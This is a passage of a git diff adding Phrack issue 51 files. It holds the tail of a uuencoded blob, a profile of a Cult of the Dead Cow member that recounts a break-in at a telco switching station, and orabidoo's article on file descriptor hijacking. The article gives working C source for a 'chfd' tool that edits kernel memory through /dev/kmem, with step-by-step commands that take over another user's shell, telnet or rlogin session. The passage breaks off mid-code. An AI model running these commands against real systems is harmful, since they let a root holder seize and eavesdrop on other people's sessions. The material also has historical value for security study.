+MH87!,)/#(DNJ%)NFZILB2QRKTLK#=;ND__J?XPG%93+$)]O$#'NA6SQWH*L^i
+M4CS A>K"!JS!PJJGZ-JC@*JF.GS$<-+%1;O&TRK&#+BY-;3$/ES!MYK'"]+'h
+MUUNS8]JW? NS@:S&:;NW=^S 'GS!.5L[^*N_8=NLUFK#3D+);XRXK%K)X FYg
+M5URUX>G#BOS_))1<R2A[R5\,R3"<Q"QCRC(1R_<QR]<AQ'!1R[)'QN0#OD'1f
+MRQ],R,;QRRH<S-5;S)&\R]"KS!D;P\OLS.['M<\LS5W;S--LS3B8S->LS295e
+MS=OLS<0GR=\LSF,<S>-LSA#5S>>LSM 7SNOLSNOTRN\LS_P6S_-LSX;7SO>Ld
+MSV"9S?OLSPZ8S_\LT"U6SP-MT"F3S@>MT#U5T OMT B3T \MT0X3T1-MT?Q2c
+MT1>MT:G9SQOMT5R3T1\MTI46T"-MTLI9TB>MTA#=T"OMTG 2TB\MTTV7TC-Mb
+MT\D2TS>MT_E7TSOMT]W2TC\MU++9T4-MU(A6U$>MU)F2TTOMU&S6_]-/+=4\a
+MG=13;=4N%]17K=5]&=5;[=6]5\Y?+=8T7=5C;=:8EM5GK=:?D=9K[=8ST]9Oz
+M+=< U-5S;=>24]=WK=<XF==[[==LV==_+=AL'=B#;=AP7=B'K=AT7=:+[=BDy
+MF]B/+=DJM\>3;=EXW=B7K=E:$]>;O==-[=F&#=JA+=BC3=I^;=JGK=>IK=IVx
+MS=JM+=>O#=MN+=NSK=:U;=MFC=NY+=:[S=M>[=L%A;X0G,H*_-ND%MFWQ,H<w
+M8L3?V[_'S5Z=[4*Y',1%/+30K6C2?4+L>\6_G*X+2]S8;9*9G9R=6K&*VJM:v
+MW,%S+-Y@7=F7V[?+?<P;.KF-:MWM39SD[?^:AQRT%M&S-@RBU(W?Y9?<EE3?u
+M_(VW<-R_X3W@P*+="$2]\RO*ZZVBT8JJ#4[58:W, F[!&)Z.!2ZX\^W?'.[At
+M9PGB)>[:#X[B0QW<*^[3+>[B.@WC94SB=%O Q5&V^HK>[MOA/Q'A(E[#L6&Js
+MWCNTPWW?A*G?L;G"K;SCF0P<#,[>9I'% OO$WINU')S&&T'*P\RK2^[?YGNHr
+M*UKCU3+C99SE49[E8YX6:EZ]$^RSONSDF6S*^YG+7F[C>.S"28OD&@ZW%?*Cq
+M1EJ^WQO@$VNK%5[HVSG"]2OHU?KGLQJYC6NJA2ZY?KRRCAZN6KSH"LS)"!KAp
+MUJVC[DOGCQZY5N'_YWI;M7^>QH/.R&P^6"K^/W?KZ:&>YC\LYD9LR,;MK]P*o
+MY=8+LG'^R"=\L+P^ZXP,QOE[PL3.MWE:W:=>RM>=Z-X:QP!.ZM/>P_"8Y/N-n
+MPL]]QL3>P-VNRH;,K+O:P@0\RL6]WO2MH>'MW+:>KMB!X(_.X%F,I"/KQ)>,m
+MQI]*IMUKYY@.L[;EZOG#K=J.Y===Q7[^I7K.L*I.PD5,[JI,R%ULPM$.QM*.l
+MY[W^J$Y<\?;=QW(L\6&^O^Q^[I(+Y"A][:@IMRAZX([:W$J:M<9]Z+=>[/CNk
+M[!-?PH5JMOOZM7L+R'F.\3G?[+ANW_=.Z7DKZ]4]N:$NH0H_I7Y[XWO^_][Pj
+MC:ST*NK[H>[#KK;5[I]7JNA&CNI27[C<_?4WGNGZV[X0&\IAC\EH/^'=?>5Ki
+M6O;*JO9G;Z]3GLI86^'Z&?54"_<P>JK42NHC7S%ESD8W:^=1P>HXKL)G3N0Uh
+M<?CV]>]X5+\A7Q61SR6-'QR13^*4#Q.6[^\G'N-K+?B?[]*A+_HJ3?H S_EOg
+M ?@NVOBKGQ\7?K[?'1.I'^F*SXF:Z;GVCN9^?[",/^):ZQ,-+ZK ;_ACV^1Sf
+M?^3'W_2X[/?7Y?F0W[*[C^MDRMQ?;L6^G_Q-WOO&#/1O?NZS?QR%?_NNNT41e
+M/QMB_O#@#K5^;/<BWZ^)*NFE?+1JR[]/^_XU2O^^FH[I#Y^_YE[%Y@X0_SX,d
+M'/C/($&#"04B/,AP(<$/"ATF9%AP(L2("B46?+@QHT2-!T..)%G2Y$F4*56Nc
+M9-G2Y4N8+P',I#DSYDV<.77NY-G3Y\^7'REF_,A19$FC%$ER)"HT8E*B*YTVb
+M/#I4)-201:LB!6ERZL*J6L&&_3KRZ5.E8:EVU2B4K=JL:9>V36LTJERS;\7Ba
+MY0O4[U_ @063K%ES\&'$B14O'NQ6H%R,29?:G=LV\D.(6T]BA$S78V;,125/z
+M=DR:\E&W:"%?GFM1L^K7>65K'NJP--[4C^N.KEQV:^G;C(4/)]ZS,,WBR94Oy
+M9^[3\=[@<;O>?C[;<TK_X'QS2U<;/2OOMYUU*RWK'>3=W+['A\=M?:][NNHGx
+MRI;/?GUS_/F9'[>IW_]_ (NK[C?[UD*-K>SJFJY VL;;3B\'Q3)//>X0%,\Ww
+M"MN#2S?)$JS00;(TU$Y!$ANTC+L'&0QP119UX@^ %F.4<<:@H++(1O"NNJ@Bv
+MSC[SL;;H0&OHK*:$Q*PVL)C*,;3-=B02R8ZB'#(X'D5+[:PIG1*RQR$]&NM(u
+M(+4LLDLNO2+M,RN7I'%--O]YL4TXXY1S3CKKM/-.//,TCC\]^_3S3T #%710t
+M0@5]LU!$$U5T448;=?11A0Z%=%)**[7T4DPSW?,X33OU]%-00Q4U3TE'-?54s
+M_U135755GDIE]57]S.MK)UGG@_567"UU-5=>62HS**E^LA7%7HLU-M%=CU66r
+M6#AE57%9:*.=,5EIE7T/M"J[1!-*+ZD:UCKLJA5WW!BI)9=7";^J3\380C3Qq
+MNG#/E7?>_?BDU]@M6>.PPF_7S?!#,^\5>.#$S"4XU;ON6Q!>;@E<^-UG9SUXp
+M8HIQ,KAB4:'3R\/U4@31X<V^N\Y9C$LVV4U[3SZ51R 99O+E++N-\MN8M?M5o
+M99Q5OCAGGGOV^6>@=@9Z:**+-EHCH8]6>FFF*TZZ::BCECK:IZ>V^FJL4ZTZn
+M:ZZ[]IK2K;\6>VRR_PR[;+335IO&L]=V^VVXE6L[;O^ZZ[;;K[GOUGMOOE?*m
+MNV_  P?\;\$+-QQNP@]7?'&Q$V?\<<BE=CQRRBLG>G++,]?\9,PW]_QS@3L'l
+M?732I16]=-13S_5TU5MW_5367Y=]]DQCI_UVW!NU/7?>>P]T=]^#%[Y.X(<Wk
+M_OAI4T9^>>8++;YYZ*,G[GGIJ[=>,.JOUW[[G;+G_GOP6?(^?/++#VE\\],Gj
+M'WWUV]^>???CEQY^^>M?GG[[\Q<>?_W[SYU__P50=@ 48 %31T #)A!T+V)@i
+M QWX0 A&4((3I& %+7A!#&90@QOD8 <]^$$0AE"$(R1A"4UX0A2F4(4K9&$+h
+M7?A"&,90AC.D80UM>$,<YE IASOD80]]^$,@!E&(0R1B$8UX1"0F48E+9&(3g
+0G?A$*$91BE.D8A5!&)  .U If
+ e
+end
+
+----[  EOF
+
diff --git a/phrack51/4.txt b/phrack51/4.txt
new file mode 100644
index 0000000..50cc071
--- /dev/null
+++ b/phrack51/4.txt
@@ -0,0 +1,252 @@
+---[  Phrack Magazine   Volume 7, Issue 51 September 01, 1997, article 04 of 17
+
+
+-------------------------[  P H R A C K     5 1     P R O P H I L E
+
+
+--------[  Grandmaster Ratte'
+
+
+
+----------------[  Personal
+
+
+             Handle: Grandmaster "Swamp" Ratte'
+           Call him: Kevin
+       Past handles: KP Neato Dee (local BBSes)
+      Handle origin: from playing around (and falling in) a swamp all the time
+                     as a kid
+      Date of Birth: April, 1970
+             Height: 6'
+             Weight: 155 lbs.
+          Eye color: blue
+         Hair Color: brown
+          Computers: Apple ][ (plus/e/c/gs), PC (8088 laptop/'286),
+                     Amiga (500/600), Macintosh (Plus/7200)
+           Admin of: Demon Roach Underground BBS, The Polka AE from Sept. 
+                     '85-present
+   Sites Frequented: Not much really.  Mindvox can be pretty cool and 
+                     interesting.  I used to regularly call boards like The 
+                     Works, Digital Logic's Data Service, the various 
+                     Metallands, Speed Demon Elite, P-80, Kingdom of Shit, 
+                     Ripco, The Metal AE, Dark Side of the Moon,  The Missing 
+                     Link, etc. 
+               URLs: www.l0pht.com/cdc.html, and the new www.cultdeadcow.com
+              Email: gratte@cultdeadcow.com 
+
+
+
+----------------[  Favorite Things
+
+
+             Women: that aren't crazy, freshly-scrubbed
+              Cars: ones that run, muscle cars with lots of chrome
+             Bikes: BMX 24" cruisers, Schwinn Stingrays with metal-flake paint
+             Foods: cheap.  Sunkist Orange Slurpees.
+             Music: 1970's funk and soul, rock, hip-hop, hillbilly country, 
+                    reggae, dance... 
+             Bands: Run-DMC, Beatles, KISS, Marvin Gaye, Suicidal Tendencies, 
+                    Black Uhuru, Public Enemy, Stevie Wonder, Rolling Stones. 
+                    Zapp, Parliament/Funkadelic, Grandmaster Flash & The
+                    Furious Five, Dead Kennedies, Black Sabbath, Carpenters, 
+                    James Brown, Metallica, Sly & The Family Stone, Lynyrd 
+                    Skynyrd, Jimi Hendrix, Slayer, Minor Threat
+       Instruments: Fender guitars and basses, Kurzweil K2000 series synths
+         Computers: Apple ][s and Macintoshes
+            Movies: Star Wars, The Manchurian Candidate, Krush Groove, 
+                    Apocalypse Now
+            Comics: Peanuts, Calvin & Hobbes, Bloom County
+            Sports: Ultimate Frisbee, bicycling, wandering around outside, 
+                    climbing trees and rocks, boating with inflatable life 
+                    rafts in drainage lakes, club dancing
+             Books: _Foucault's Pendulum_ by Umberto Eco, The Bible, Farrah 
+                    Fawcett's biography, and _Understanding Media_ by Marshall 
+                    McLuhan
+         Magazines: Tons... 2600, Grand Royal, Wired, Macworld, Barely Legal, 
+                    Thrasher, Big Brother, Ride BMX, Urb, Guitar Player, 
+                    Keyboard, Cool Beans, Might, Stress, Slap, Crank, 4080, 
+                    Cometbus, EQ, and whatever else I can get my grubby hands 
+                    on.  I really dig magazines.  Uh, and Phrack! 
+                TV: The Six Million Dollar Man, The Simpsons, Charlie's Angels, 
+                    X-Files, A-Team, Mod Squad 
+          My Bands: Superior Products (bass), Weasel-MX (vox, programming), 
+                    Jinx Unit (bass, phat beatz)
+            Quotes: "Fully equipped with an army of lawyers." -ad for Zoo York 
+                    skateboards
+            People: Evel Knievel, Boba Fett, Mr. T, and the CULT OF THE DEAD 
+                    COW Multimedia Superstarz!
+              Misc: thrift stores, huge shiny belt buckles, phresh new laces 
+                    in my kicks, playing shows with my band(s), exploring 
+                    buildings, big trees and rocks
+          Turn Ons: energy
+         Turn Offs: pretentiousness
+
+
+
+----------------[  Passions
+
+
+    If you can't tell from the list up there, I'm really into music.  It all 
+started when the neighborhood teenagers would let me sit around with them and 
+listen to the hard-rockin' soundz of KISS and Led Zep when I was a little kid. 
+So my mom (bless her heart) under their advisement, bought me Led Zeppelin 
+_IV_ and KISS _Alive!_ which I took to kindergarden class and was reprimanded 
+for.  A few years later my grade school friends and I would spend hours 
+sitting around a cassette player making "radio shows" with our Saturday Night 
+Fever soundtrack and various 7" singles from K-Mart.  We were rollin' with the 
+phattest mixtapes at age nine, fool!  Somehow this led to MIDI and drum 
+machines and CD burners and now I spend tons of time recording and sequencing 
+and playing music.  I do a lot of recording for the local punk and hip-hop 
+groups and it's hella fun.  The back of the building I live in is a small 
+empty warehouse where we have all-ages music shows and that's pretty neat too. 
+It's called MOTOR... If you're in a touring band, lemme know and send me a 
+tape or whatever you've got.
+
+
+
+----------------[   Memorable experiences
+
+
+    Hmm.  Well, this is probably my best story, so here we go: I found myself 
+all alone at night inside a telco's switching station.  Ooh, look... a terminal 
+keyboard.  In the dim glow of the red "EXIT" signs, that keyboard represented
+all my hopes for a glorious unification of the human spirit through the global 
+telecommunications network.  How could I best express my ...love... for this 
+network and all that it represents?  Write a poem?  Done it already, hundreds 
+of times.  Every cDc file I've put out is a gesture of affection.  So I did 
+what any red-blooded American male wouid do.  I dropped my pants, "threw 
+jacks" as it were, and doused that human-machine interface unit with my 
+Seekrut Sauce.
+
+    Then I cleaned myself and got the hell out of there... pulse pounding, 
+freaked by my own insatiable lust.  Is what I did "WRONG"?  Don't judge me 
+with your pithy concepts of morality!  I stood before God with my pants around 
+my ankles and expressed what was in my heart.  If that's wrong, damn... I 
+don't want to be right!
+
+---
+
+    Playing a party where a gang fight broke out, caps were busted during our 
+set, and we had to drop our instruments to flee for our livez (and hide under 
+cars).
+
+---
+
+Falling in love.  Getting dumped.  Lather, rinse, repeat.
+
+---
+
+    Going to the various hacker cons is always a blast.  Some people have a 
+negative attitude about these things 'cause a lot of kids go and act retarded.  
+Which is unfortunate, but I always manage to have a great time.  These are the 
+only times I get to visit with cDc people and it's like a big bonding 
+session... we just run around and hang out.  Meet lots of cool people in 
+general, every time.  So go to the cons and don't cause problems, and 
+everything'll be fine.  
+
+---
+
+    Starting cDc communications.  In some ways this has been an important item 
+in my life.  Not that editing text files is a huge important thing, 'cause it's 
+not.  But cDc, at its best, has taught me that I can have a role in making 
+something creative and interesting and lasting.  Things like that can carry 
+over into a lot of aspects in your life.  In 1984 I was a junior high student 
+and now I'm 27 years old.  cDc has changed a lot of course, as it should, but 
+I think with our longevity we've worked towards finding a new way to relate to 
+technology and the emerging global structure.  I was fourteen and part of the 
+wave of hacker kids who had been growing up with Atari 2600s at home and the 
+video arcade after school... we saw the movie Wargames and got excited.  I was 
+lucky and had an Apple ][ at home, and soon a modem my dad brought home from 
+work.  You figured out some Stupid Phone Tricks and bam, in no time you were 
+typing away to other kids on BBSes across the country, sharing.... codez and 
+warez, sure, but more importantly we shared experiences.  This was NEW.
+I remember how exciting it was to call teenager-run boards across the country 
+in the early '80s and exchange messages with these people.  Now kids can grow 
+up from the get-go with the Internet in their house and I think that's just
+great.  So my friends and I were writing things and doing goofy drawings and 
+whatnot, and could have put out a regular paper 'zine.  But we figured out 
+pretty early on that the one big advantage these text files we wrote had over 
+some photocopied sheets we could staple together was distribution.  If we'd 
+done a paper 'zine, we could have maybe scraped up enough cash for 50 copies 
+or so and forced some friends to take them and then they'd end up at the 
+bottom of a closet or in the trash in a few weeks, forgotten.  But instead, we 
+used those Stupid Phone Tricks hundreds of times... staying up all night, with 
+school looming ahead in a few hours.  But hey, gotta call that AE in New 
+Jersey and upload the latest text files.  You can always sleep through class.
+
+    But what makes CULT OF THE DEAD COW different and has enabled us to last 
+is that cDc has never been about technology... we didn't form to trade "inpho" 
+and hack together like the other groups.  We used technology, be it hand - 
+hacked MCI codes or the Internet to get our "messages" out there.  Hacking is 
+a means to an end.  I don't give a rat's ass about hacking or any of that crap 
+on its own.  I just want to make cool stuff.  Now we're starting a "paramedia" 
+concept which means the end of cDc as a "hacker group that puts out text 
+files."  Now we're putting out our own original music and other audio files, 
+to be distributed just like our text stuff has traditionally been.  The 
+bandwidth is finally here where we can do it... and when it's practical, we'll 
+be putting out video stuff too.  The idea is to be able to do whatever sort of 
+creative work we want and to use our huge distribution network to disseminate 
+it.  That's what "cDc paramedia" and the future of our whole group is about.   
+
+    Somebody who was making his college schedule wrote me email the other day, 
+and asked "What classes should I take?  I wanna be a hacker."  I told him he'd 
+be better off with some history and business courses.  Please understand, I 
+don't mean to diss on hacking.  I'm all for having all the knowledge you can 
+and exploring things, whatever they may be.  But I've met a lot of bitter old 
+"gadget freaks" in this scene, and that's something you want to stay away from.
+
+    That mentality will crush the life out of you under the weight of a 
+thousand bits of trivia.  Go outside, there's a world there already.  It's a 
+zillion times more exciting and vibrant that what you can build staring into a 
+monitor's dim glare.  Hour after hour, year after year.  As your eyesight 
+fails you and your head draws nearer the image, your shoulders slump.  You 
+become weak.  You are less.  
+
+
+
+----------------[  People to mention
+
+
+The Egyptian Lover: The whole 806 NPA's only real phreak who ran a great 
+  BBS, The Missing Link, in 1984.  I've only seen him a couple of times in 
+  person, but have to give him mad props for helping Franken Gibe and myself 
+  get situated with the phreak knowledge.  His board attracted guys from The 
+  Apple Mafia and The Untouchables (the first warez groups ever), and The 
+  Knights of Shadow.  Though I'd been getting warez since 1982, The Missing 
+  Link was our first contact with the real "elite" h/p scene, and it both 
+  fascinated and repulsed us.
+     
+      Franken Gibe: Bill helped start and really define cDc back in the day.  
+  He's a really cool guy.  I've known him for over ten years.  What can I say? 
+  We're still, to this day, working on things; though he hasn't been active in 
+  cDc since '89 or so.  Now we're trying to start an advertising agency.
+
+      Tippy Turtle: Jason gave me my first local BBS number.  I pushed him to  
+  finish "Bunny Lust", which is one of our most popular articles ever.  There 
+  have been court cases inspired by that file, and he wrote it when he was 
+  fourteen.  He came back to town last Christmas and I showed him the cDc web 
+  site.  His comment?  "That's totally evil.  I can't believe how evil this is."
+
+       Mohawk Dave: Christoph is another one of my oldest friends who never 
+  fails to diss cDc.  He's a mega-talented AI/robotics guy, and a rad 
+  guitarist and BMX freestyle rider too.  Our group of friends spent countless 
+  hours cruising the neighborhoods of our hometown on bikes, talking, setting 
+  fires, breaking & entering, and having a good ol' time.
+
+    Ex-girlfriends: Blech.
+
+All the other cDc people.  Dang, there've been maybe fifty or so over the 
+years and they've all done their thing well and I'm really happy they did.  
+They know what's up... this part could run on forever, so I'll just stop.
+
+
+
+----------------[   Pearls Of Wisdom
+
+
+Procrastination is the denial of death.
+Lift with your legs, not your back.
+      					
+
+----[  EOF
+
diff --git a/phrack51/5.txt b/phrack51/5.txt
new file mode 100644
index 0000000..7a4cad3
--- /dev/null
+++ b/phrack51/5.txt
@@ -0,0 +1,578 @@
+---[  Phrack Magazine   Volume 7, Issue 51 September 01, 1997, article 05 of 17
+
+
+-------------------------[  File Descriptor Hijacking
+
+
+--------[  orabidoo <odar@pobox.com>
+
+
+Introduction
+------------
+
+We often hear of tty hijacking as a way for root to take over a user's
+session.  The traditional tools for this use STREAMS on SysV machines,
+and one article in Phrack 50 presented a way to do it in Linux, using
+loadable modules.
+
+I'll describe here a simple technique that lets root take over a local
+or remote session.  I've implemented it for Linux and FreeBSD; it should
+be easy to port it to just about any Un*x-like system where root can
+write to kernel memory.
+
+The idea is simple: by tweaking the kernel's file descriptor tables, one
+can forcefully move file descriptors from one process to another.  
+This method allows you to do almost anything you want: redirect the
+output of a running command to a file, or even take over your neighbor's
+telnet connection.
+
+
+How the kernel keeps track of open file descriptors
+---------------------------------------------------
+
+In Un*x, processes access resources by means of file descriptors, which
+are obtained via system calls such as open(), socket() and pipe().  From
+the process's point of view, the file descriptor is an opaque handle to
+the resource.  File descriptors 0, 1 and 2 represent standard input,
+output and error, respectively.  New descriptors are always allocated in
+sequence.
+
+On the other side of the fence, the kernel keeps, for each process, a
+table of file descriptors (fds), with a pointer to a structure for each
+fd.  The pointer is NULL if the fd isn't open.  Otherwise, the structure
+holds information about what kind of fd it is (a file, a socket, a
+pipe, etc), together with pointers to data about the resource that the fd
+accesses (the file's inode, the socket's address and state information,
+and so on).
+
+The process table is usually an array or a linked list of structures.
+From the structure for a given process, you can easily find a pointer to
+the internal fd table for that process.  
+
+In Linux, the process table is an array (called "task") of struct
+task_struct's, and includes a pointer to a struct files_struct, which
+has the fd array (look at /usr/include/linux/sched.h for details).  In
+SunOS 4, the process table is a linked list of struct proc's, which
+include a pointer to the u_area, which has info about the fds (look at
+/usr/include/sys/proc.h).  In FreeBSD, it's also a linked list (called
+"allproc") of struct proc's, which include a pointer to a struct
+filedesc with the fd table (also according to /usr/include/sys/proc.h).
+
+If you have read and write access to the kernel's memory (which, in most
+cases, is the same as having read/write access to /dev/kmem), there's
+nothing to prevent you from messing with these fd tables, stealing open
+fd's from a process and reusing them in another one.  
+
+The only major case where this won't work are systems based on BSD4.4
+(such as {Free, Net, Open}BSD) running at a securelevel higher than 0.
+In that mode, write access to /dev/mem and /dev/kmem is disabled, among
+other things.  However, many BSD systems run at securelevel -1, which leaves
+them vulnerable, and in many others it may be possible to get the securelevel 
+to be -1 at the next boot by tweaking the startup scripts.  On FreeBSD, you 
+can check the securelevel with the command "sysctl kern.securelevel".  Linux 
+also has securelevels, but they don't prevent you from accessing /dev/kmem.
+
+
+File descriptor hijacking
+-------------------------
+
+The kernel's internal variables are really not made to be modified like
+this by user programs, and it shows.  
+
+First of all, on a multitasking system, you have no guarantee that the
+kernel's state won't have changed between the time you find out a
+variable's address and the time you write to it (no atomicity).  This is 
+why these techniques shouldn't be used in any program that aims for 
+reliability.  That being said, in practice, I haven't seen it fail, because 
+the kernel doesn't move this kind of data around once it has allocated it 
+(at least for the first 20 or 32 or 64 or so fds per process), and because 
+it's quite unlikely that you'll do this just when the process is closing or
+opening a new fd.
+
+You still want to try it?
+
+For simplicity's sake, we won't try to do things like duplicating an fd
+between two processes, or passing an fd from one process to another
+without passing another one in return.  Instead, we'll just exchange an
+fd in one process with another fd in another process.  This way we only
+have to deal with open files, and don't mess with things like reference
+counts.  This is as simple as finding two pointers in the kernel and
+switching them around.  A slightly more complicated version of this
+involves 3 processes, and a circular permutation of the fds.
+
+Of course, you have to guess which fd corresponds to the resource you
+want to pass.  To take complete control of a running shell, you'll want
+its standard input, output and error, so you'll need to take the 3 fds
+0, 1 and 2.  To take control of a telnet session, you'll want the fd of
+the inet socket that telnet is using to talk to the other side, which is
+usually 3, and exchange it with another running telnet (so it knows what
+to do with it).  Under Linux, a quick look at /proc/[pid]/fd will tell
+you which fds the process is using.
+
+
+Using chfd
+----------
+
+I've implemented this for Linux and FreeBSD; it would be fairly easy to
+port to other systems (as long as they let you write to /dev/mem or
+/dev/kmem, and have the equivalent of a /usr/include/sys/proc.h to
+figure out how it works).
+
+To compile chfd for Linux, you need to figure out a couple things about
+the running kernel.  If it's a 1.2.13 or similar, you'll need to
+uncomment the line /* #define OLDLINUX */, because the kernel's
+structures have changed since then.  If it's 2.0.0 or newer, it should
+work out of the box, although it could change again...    
+
+Then you need to find the symbol table for the kernel, which is usually
+in /boot/System.map or similar.  Make sure this corresponds to the
+kernel that is actually running, and look up the address for the "task"
+symbol.  You need to put this value in chfd, instead of "00192d28".
+Then compile with "gcc chfd.c -o chfd".
+
+To compile chfd for FreeBSD, just get the FreeBSD code and compile it
+with "gcc chfd.c -o chfd -lkvm".  This code was written for FreeBSD
+2.2.1, and might need tweaking for other versions.
+
+Once it's compiled, you invoke chfd with 
+
+ 	chfd pid1 fd1 pid2 fd2
+or
+	chfd pid1 fd1 pid2 fd2 pid3 fd3
+
+In the first case, the fds are just swapped.  In the second case, the
+second process gets the first's fd, the third gets the second's fd, and
+the first gets the third's fd.
+
+As a special case, if one of the pids is zero, the corresponding fd is
+discarded, and a fd on /dev/null is passed instead.
+
+
+Example 1
+---------
+
+. a long calculation is running with pid 207, and with output to the tty
+. you type "cat > somefile", and look up cat's pid (say 1746)
+
+Then doing
+
+	chfd 207 1 1746 1
+
+will redirect the calculation on the fly to the file "somefile", and the
+cat to the calculation's tty.  Then you can ^C the cat, and leave the
+calculation running without fear of important results scrolling by.
+
+
+Example 2
+---------
+
+. someone is running a copy of bash on a tty, with pid 4022
+. you are running another copy of bash on a tty, with pid 4121
+
+Then you do
+
+	sleep 10000  
+	  # on your own bash, so it won't read its tty for a while,
+	  # otherwise your shell gets an EOF from /dev/null and leaves
+	  # the session immediately
+	chfd 4022 0 0 0 4121 0
+	chfd 4022 1 0 0 4121 1
+	chfd 4022 2 0 0 4121 2
+
+and you find yourself controlling the other guy's bash, and getting the
+output too, while the guy's keystrokes go to /dev/null.  When you exit
+the shell, he gets his session disconnected, and you're back in your
+sleep 10000 which you can safely ^C now.  
+
+Different shells might use different file descriptors; zsh seems to use
+fd 10 to read from the tty, so you'll need to exchange that too.
+
+
+Example 3
+---------
+
+. someone is running a telnet on a tty, with pid 6309
+. you start a telnet to some worthless port that won't drop the 
+  connection too quickly (telnet localhost 7, telnet www.yourdomain 80,
+  whatever), with pid 7081
+. under Linux, a quick look at /proc/6309/fd and /proc/7081/fd tells you
+  telnet is using fds 0, 1, 2 and 3, so 3 must be the connection.
+
+Then doing
+
+	chfd 6309 3 7081 3 0 0
+
+will replace the network connection with a /dev/null on the guy's telnet
+(which reads an EOF, so he'll get a "Connection closed by foreign
+host."), and your telnet finds itself connected to the guy's remote
+host.  At this point you'll probably need to press ^] and type "mode
+character" to tell your telnet to stop echoing your lines locally.
+
+
+Example 4
+---------
+
+. someone is running an rlogin on a tty; each rlogin uses two processes, 
+  with pids 4547 and 4548
+. you start an rlogin localhost on another tty, with pids 4852 and 4855
+. a quick look at the relevant /proc/../fds tells you that each of the
+  rlogin processes is using fd 3 for the connection.
+
+Then doing
+
+	chfd 4547 3 4552 3
+	chfd 4548 3 4555 3
+
+does just what you expect.  Except that your rlogin may still be blocked
+by the kernel because it's waiting on an event that won't happen (having
+data to read from localhost); in that case you wake it up with a kill
+-STOP followed by 'fg'.
+
+
+You get the idea.  When a program gets another one's fd, it's important
+that it knows what to do with it; in most cases you achieve this by
+running a copy of the same program you want to take over, unless you're
+passing a fd on /dev/null (which gives an EOF) or just passing
+stdin/stdout/stderr.  
+
+
+Conclusion
+----------
+
+As you can see, you can do quite powerful things with this.  And there
+isn't really much you can do to protect yourself from some root doing
+this, either.  
+
+It could be argued that it's not even a security hole; root is
+*supposed* to be able to do these things.  Otherwise there wouldn't be
+explicit code in the drivers for /dev/kmem to let you write there, would
+there?
+
+
+The Linux code
+--------------
+
+<++> fd_hijack/chfd-linux.c
+/*  chfd - exchange fd's between 2 or 3 running processes.
+ *  
+ *  This was written for Linux/intel and is *very* system-specific.
+ *  Needs read/write access to /dev/kmem; setgid kmem is usually enough.
+ *
+ *  Use: chfd pid1 fd1 pid2 fd2 [pid3 fd3]
+ *
+ *  With two sets of arguments, exchanges a couple of fd between the 
+ *  two processes.
+ *  With three sets, the second process gets the first's fd, the third gets
+ *  the second's fd, and the first gets the third's fd.
+ *
+ *  Note that this is inherently unsafe, since we're messing with kernel
+ *  variables while the kernel itself might be changing them.  It works
+ *  in practice, but no self-respecting program would want to do this.
+ *
+ *  Written by: orabidoo <odar@pobox.com>
+ *  First version: 14 Feb 96
+ *  This version: 2 May 97
+ */
+
+
+#include <stdio.h>
+#include <unistd.h>
+#include <fcntl.h>
+#define __KERNEL__		/* needed to access kernel-only definitions */
+#include <linux/sched.h>
+
+/* #define OLDLINUX */		/* uncomment this if you're using Linux 1.x;
+				   tested only on 1.2.13 */
+
+#define TASK 0x00192d28		/* change this! look at the system map,
+				   usually /boot/System.map, for the address
+				   of the "task" symbol */
+
+#ifdef OLDLINUX
+#  define FD0 ((char *)&ts.files->fd[0] - (char *)&ts)
+#  define AD(fd) (taskp + FD0 + 4*(fd))
+#else
+#  define FILES ((char *)&ts.files - (char *)&ts)
+#  define FD0 ((char *)&fs.fd[0] - (char *)&fs)
+#  define AD(fd) (readvalz(taskp + FILES) + FD0 + 4*(fd))
+#endif
+
+
+int kfd;
+struct task_struct ts;
+struct files_struct fs;
+int taskp;
+
+int readval(int ad) {
+  int val, r;
+
+  if (lseek(kfd, ad, SEEK_SET) < 0)
+    perror("lseek"), exit(1);
+  if ((r = read(kfd, &val, 4)) != 4) {
+    if (r < 0)
+      perror("read");
+    else fprintf(stderr, "Error reading...\n");
+    exit(1);
+  }
+  return val;
+}
+
+int readvalz(int ad) {
+  int r = readval(ad);
+  if (r == 0)
+    fprintf(stderr, "NULL pointer found (fd not open?)\n"), exit(1);
+  return r;
+}
+
+void writeval(int ad, int val) {
+  int w;
+
+  if (lseek(kfd, ad, SEEK_SET) < 0)
+    perror("lseek"), exit(1);
+  if ((w = write(kfd, &val, 4)) != 4) {
+    if (w < 0)
+      perror("write");
+    else fprintf(stderr, "Error writing...\n");
+    exit(1);
+  }
+}
+
+void readtask(int ad) {
+  int r;
+
+  if (lseek(kfd, ad, SEEK_SET)<0)
+    perror("lseek"), exit(1);
+  if ((r = read(kfd, &ts, sizeof(struct task_struct))) !=
+	sizeof(struct task_struct)) {
+    if (r < 0)
+      perror("read");
+    else fprintf(stderr, "Error reading...\n");
+    exit(1);
+  }
+}
+
+void findtask(int pid) {
+  int adr;
+
+  for (adr=TASK; ; adr+=4) {
+    if (adr >= TASK + 4*NR_TASKS)
+      fprintf(stderr, "Process not found\n"), exit(1);
+    taskp = readval(adr);
+    if (!taskp) continue;
+    readtask(taskp);
+    if (ts.pid == pid) break;
+  }
+}
+
+int main(int argc, char **argv) {
+  int pid1, fd1, pid2, fd2, ad1, val1, ad2, val2, pid3, fd3, ad3, val3;
+  int three=0;
+
+  if (argc != 5 && argc != 7)
+    fprintf(stderr, "Use: %s pid1 fd1 pid2 fd2 [pid3 fd3]\n", argv[0]), 
+    exit(1);
+
+  pid1 = atoi(argv[1]), fd1 = atoi(argv[2]);
+  pid2 = atoi(argv[3]), fd2 = atoi(argv[4]);
+  if (argc == 7)
+    pid3 = atoi(argv[5]), fd3 = atoi(argv[6]), three=1;
+
+  if (pid1 == 0)
+    pid1 = getpid(), fd1 = open("/dev/null", O_RDWR);
+  if (pid2 == 0)
+    pid2 = getpid(), fd2 = open("/dev/null", O_RDWR);
+  if (three && pid3 == 0)
+    pid3 = getpid(), fd3 = open("/dev/null", O_RDWR);
+
+  kfd = open("/dev/kmem", O_RDWR);
+  if (kfd < 0)
+    perror("open"), exit(1);
+
+  findtask(pid1);
+  ad1 = AD(fd1);
+  val1 = readvalz(ad1);
+  printf("Found fd pointer 1, value %.8x, stored at %.8x\n", val1, ad1);
+
+  findtask(pid2);
+  ad2 = AD(fd2);
+  val2 = readvalz(ad2);
+  printf("Found fd pointer 2, value %.8x, stored at %.8x\n", val2, ad2);
+
+  if (three) {
+    findtask(pid3);
+    ad3 = AD(fd3);
+    val3 = readvalz(ad3);
+    printf("Found fd pointer 3, value %.8x, stored at %.8x\n", val3, ad3);
+  }
+
+  if (three) {
+    if (readval(ad1)!=val1 || readval(ad2)!=val2 || readval(ad3)!=val3) {
